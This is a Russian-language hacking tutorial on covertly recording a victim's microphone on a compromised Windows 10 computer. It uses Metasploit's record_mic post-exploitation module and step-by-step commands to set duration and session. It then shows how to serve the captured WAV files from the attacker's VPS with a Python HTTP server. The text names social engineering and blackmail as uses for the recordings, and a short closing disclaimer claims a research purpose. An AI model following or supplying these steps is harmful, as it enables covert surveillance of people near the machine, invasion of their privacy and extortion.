Как удаленно записывать и прослушивать микрофон взломанного компьютера |

Как удаленно записывать и прослушивать микрофон взломанного компьютера

Мануал

Микрофон на компьютере под управлением Windows доступен для большинства приложений, работающих на устройстве, и полностью без ограничений безопасности.

Информация, собранная из записанных аудиозаписей, происходящих в окрестностях скомпрометированного компьютера, может использоваться для социальной инженерии, шантажа или по ряду других причин.

После того, как хакер создал полезную нагрузку, затем установил бэкдор на уязвимом компьютере под управлением Windows 10, они могут использовать Metasploit для выполнения множества различных атак, таких как захват скриншотов и нажатий клавиш, кража паролей и поиск удаленных файлов.

В этом случае мы покажем, как хакер может использовать микрофон своей жертвы для легкого подслушивания.

Микрофоны, встроенные в портативные компьютеры, могут использоваться процессами и службами, запущенными на компьютере под управлением Windows без каких-либо соображений безопасности.

Это позволяет хакерам легко злоупотреблять доверием Windows к сторонним приложениям и собирать аудиозаписи, используя микрофон скомпрометированного компьютера.

Шаг 1 Аудиозапись без записи

В Metasploit встроен модуль record_mic, который может использоваться для создания аудиозаписей с взломанного компьютера.

Чтобы начать использовать модуль record_mic, введите команду ниже.

 use post/multi/manage/record_mic 

Доступные параметры модуля можно просмотреть с помощью команды options.

Опция DURATION определяет длину аудиозаписи, записанную через микрофон цели.

Команда set может использоваться для настройки продолжительности звука в секундах.

 set DURATION 30

Затем в параметрах модуля необходимо указать идентификатор SESSION.

Команда SESSION может использоваться для просмотра доступных скомпрометированных устройств.

 sessions 

Установите идентификатор SESSION, используя команду ниже.

 set SESSION 1

С установленными параметрами команда запуска может быть использована для начала записи звука на целевом компьютере.

Оболочка msf сообщит о ходе записи, как это происходит.

По завершении аудиофайл автоматически будет сохранен в каталоге /root/.msf4/loot/ с использованием аудиоформата WAV.

Шаг 2 Найдите записанные аудиофайлы

Чтобы получить доступ к вновь созданной аудиозаписи, сохраненной на VPS, из оболочки msf, команда cd может использоваться для изменения в каталоге /root/.msf4/loot/.

 cd /root/.msf4/loot/ 

Используйте Python3 для создания простого HTTP-сервера на порту 8080, используя следующую команду.

Аргумент -m вызывает модуль «http.server» Python3, а 8080 – это порт, открытый и используемый для размещения веб-сервера.

 python3 -m http.server 8080 

Хотя сервер Python3 действует как временный веб-сервер, терминал msf не будет использоваться.

Тем не менее, тогда будет возможно просматривать аудиофайлы из любого веб-браузера в мире, введя IP-адрес VPS в панель поиска браузера и добавив номер порта (8080) к IP-адресу VPS с двоеточием.

http://Your.VPS.IP.Address:8080/

Веб-сервер Python3 можно завершить, нажав Ctrl + C на клавиатуре.

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий